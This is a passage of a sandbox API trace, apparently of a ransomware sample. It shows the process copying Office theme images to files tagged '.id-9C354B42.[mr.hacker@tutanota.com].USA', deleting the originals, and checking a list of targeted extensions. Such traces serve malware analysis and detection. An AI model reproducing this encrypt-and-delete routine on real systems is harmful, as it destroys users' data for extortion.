(lpString=".ppt") returned 4 [0044.877] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.877] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.877] lstrlenW (lpString=".zip") returned 4 [0044.877] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.877] lstrlenW (lpString=".rar") returned 4 [0044.877] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.877] lstrlenW (lpString=".bz2") returned 4 [0044.878] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.878] lstrlenW (lpString=".7z") returned 3 [0044.878] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.878] lstrlenW (lpString=".dbf") returned 4 [0044.878] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.878] lstrlenW (lpString=".1cd") returned 4 [0044.878] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.878] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.878] lstrlenW (lpString=".jpg") returned 4 [0044.878] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.878] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0044.878] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.878] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.197] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=27407) returned 1 [0045.197] CloseHandle (hObject=0x208) returned 1 [0045.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png")) returned 0x20 [0045.197] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.197] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0045.198] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.198] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.198] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0045.198] GetLastError () returned 0x0 [0045.198] ReadFile (in: hFile=0x208, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x6b0f, lpOverlapped=0x0) returned 1 [0045.246] WriteFile (in: hFile=0x1f4, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x6b10, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x6b10, lpOverlapped=0x0) returned 1 [0045.248] ReadFile (in: hFile=0x208, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0045.248] WriteFile (in: hFile=0x1f4, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.248] SetEndOfFile (hFile=0x1f4) returned 1 [0045.248] CloseHandle (hObject=0x1f4) returned 1 [0045.248] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.248] SetEndOfFile (hFile=0x208) returned 1 [0045.249] CloseHandle (hObject=0x208) returned 1 [0045.249] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0045.249] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png")) returned 1 [0045.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0045.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0045.249] lstrlenW (lpString=".doc") returned 4 [0045.249] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.249] lstrlenW (lpString=".docx") returned 5 [0045.249] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.250] lstrlenW (lpString=".pdf") returned 4 [0045.250] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.250] lstrlenW (lpString=".xls") returned 4 [0045.250] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.250] lstrlenW (lpString=".xlsx") returned 5 [0045.250] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.250] lstrlenW (lpString=".ppt") returned 4 [0045.250] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0045.250] lstrlenW (lpString=".zip") returned 4 [0045.250] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.250] lstrlenW (lpString=".rar") returned 4 [0045.250] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.250] lstrlenW (lpString=".bz2") returned 4 [0045.250] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.250] lstrlenW (lpString=".7z") returned 3 [0045.250] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0045.250] lstrlenW (lpString=".dbf") returned 4 [0045.250] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0045.250] lstrlenW (lpString=".1cd") returned 4 [0045.250] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0045.250] lstrlenW (lpString=".jpg") returned 4 [0045.250] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0045.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0045.250] lstrlenW (lpString=".doc") returned 4 [0045.250] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.250] lstrlenW (lpString=".docx") returned 5 [0045.250] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.250] lstrlenW (lpString=".pdf") returned 4 [0045.250] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.250] lstrlenW (lpString=".xls") returned 4 [0045.251] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.251] lstrlenW (lpString=".xlsx") returned 5 [0045.251] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.251] lstrlenW (lpString=".ppt") returned 4 [0045.251] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0045.251] lstrlenW (lpString=".zip") returned 4 [0045.251] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.251] lstrlenW (lpString=".rar") returned 4 [0045.251] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.251] lstrlenW (lpString=".bz2") returned 4 [0045.251] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.251] lstrlenW (lpString=".7z") returned 3 [0045.251] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0045.251] lstrlenW (lpString=".dbf") returned 4 [0045.251] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0045.251] lstrlenW (lpString=".1cd") returned 4 [0045.251] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0045.251] lstrlenW (lpString=".jpg") returned 4 [0045.251] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.251] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0045.251] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0045.276] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=32607) returned 1 [0045.279] CloseHandle (hObject=0x174) returned 1 [0045.285] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png")) returned 0x20 [0045.292] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.292] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0045.292] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.293] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.293] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0045.293] GetLastError () returned 0x0 [0045.293] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x7f5f, lpOverlapped=0x0) returned 1 [0045.314] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x7f60, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x7f60, lpOverlapped=0x0) returned 1 [0045.316] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0045.316] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.316] SetEndOfFile (hFile=0x174) returned 1 [0045.316] CloseHandle (hObject=0x174) returned 1 [0045.316] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.316] SetEndOfFile (hFile=0x210) returned 1 [0045.317] CloseHandle (hObject=0x210) returned 1 [0045.317] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0045.317] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png")) returned 1 [0045.317] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0045.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0045.318] lstrlenW (lpString=".doc") returned 4 [0045.318] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.318] lstrlenW (lpString=".docx") returned 5 [0045.318] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.318] lstrlenW (lpString=".pdf") returned 4 [0045.318] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.318] lstrlenW (lpString=".xls") returned 4 [0045.318] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.318] lstrlenW (lpString=".xlsx") returned 5 [0045.318] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.318] lstrlenW (lpString=".ppt") returned 4 [0045.318] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0045.318] lstrlenW (lpString=".zip") returned 4 [0045.318] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.318] lstrlenW (lpString=".rar") returned 4 [0045.318] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.318] lstrlenW (lpString=".bz2") returned 4 [0045.318] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.318] lstrlenW (lpString=".7z") returned 3 [0045.318] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0045.318] lstrlenW (lpString=".dbf") returned 4 [0045.318] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0045.318] lstrlenW (lpString=".1cd") returned 4 [0045.318] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0045.318] lstrlenW (lpString=".jpg") returned 4 [0045.318] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0045.318] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0045.318] lstrlenW (lpString=".doc") returned 4 [0045.319] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.319] lstrlenW (lpString=".docx") returned 5 [0045.319] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.319] lstrlenW (lpString=".pdf") returned 4 [0045.319] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.319] lstrlenW (lpString=".xls") returned 4 [0045.319] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.319] lstrlenW (lpString=".xlsx") returned 5 [0045.319] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.319] lstrlenW (lpString=".ppt") returned 4 [0045.319] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0045.319] lstrlenW (lpString=".zip") returned 4 [0045.319] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.319] lstrlenW (lpString=".rar") returned 4 [0045.319] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.319] lstrlenW (lpString=".bz2") returned 4 [0045.319] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.319] lstrlenW (lpString=".7z") returned 3 [0045.319] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0045.319] lstrlenW (lpString=".dbf") returned 4 [0045.319] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0045.319] lstrlenW (lpString=".1cd") returned 4 [0045.319] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG") returned 75 [0045.319] lstrlenW (lpString=".jpg") returned 4 [0045.319] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.319] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0045.319] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.319] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0045.320] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x2aaff1c | out: lpFileSize=0x2aaff1c*=1287) returned 1 [0045.320] CloseHandle (hObject=0x210) returned 1 [0045.320] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif")) returned 0x20 [0045.320] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0045.320] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0045.320] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.320] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.320] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0045.343] GetLastError () returned 0x0 [0045.343] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x507, lpOverlapped=0x0) returned 1 [0045.348] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x510, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0x510, lpOverlapped=0x0) returned 1 [0045.349] ReadFile (in: hFile=0x210, lpBuffer=0x3070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2aafed4, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2aafed4*=0x0, lpOverlapped=0x0) returned 1 [0045.349] WriteFile (in: hFile=0x1f0, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2aafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2aafc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.349] SetEndOfFile (hFile=0x1f0) returned 1 [0045.349] CloseHandle (hObject=0x1f0) returned 1 [0045.349] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2aafec8 | out: lpNewFilePointer=0x0) returned 1 [0045.349] SetEndOfFile (hFile=0x210) returned 1 [0045.350] CloseHandle (hObject=0x210) returned 1 [0045.350] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0045.350] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif")) returned 1 [0045.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.351] lstrlenW (lpString=".doc") returned 4 [0045.351] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.351] lstrlenW (lpString=".docx") returned 5 [0045.351] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.351] lstrlenW (lpString=".pdf") returned 4 [0045.351] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.351] lstrlenW (lpString=".xls") returned 4 [0045.351] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.351] lstrlenW (lpString=".xlsx") returned 5 [0045.351] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.351] lstrlenW (lpString=".ppt") returned 4 [0045.351] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.351] lstrlenW (lpString=".zip") returned 4 [0045.351] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.351] lstrlenW (lpString=".rar") returned 4 [0045.351] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.351] lstrlenW (lpString=".bz2") returned 4 [0045.351] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.351] lstrlenW (lpString=".7z") returned 3 [0045.351] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.351] lstrlenW (lpString=".dbf") returned 4 [0045.351] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.351] lstrlenW (lpString=".1cd") returned 4 [0045.351] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.351] lstrlenW (lpString=".jpg") returned 4 [0045.351] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 76 [0045.352] lstrlenW (lpString=".doc") returned 4 [0045.352] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.352] lstrlenW (lpString=".docx") returned 5 [0045.352] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.352] lstrlenW (lpString=".pdf") returned 4 [0045.352] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.352] lstrlenW (lpString=".xls") returned 4 [0045.352] lstrcmpiW (lpString1=".xls", lpString2=".GIF") 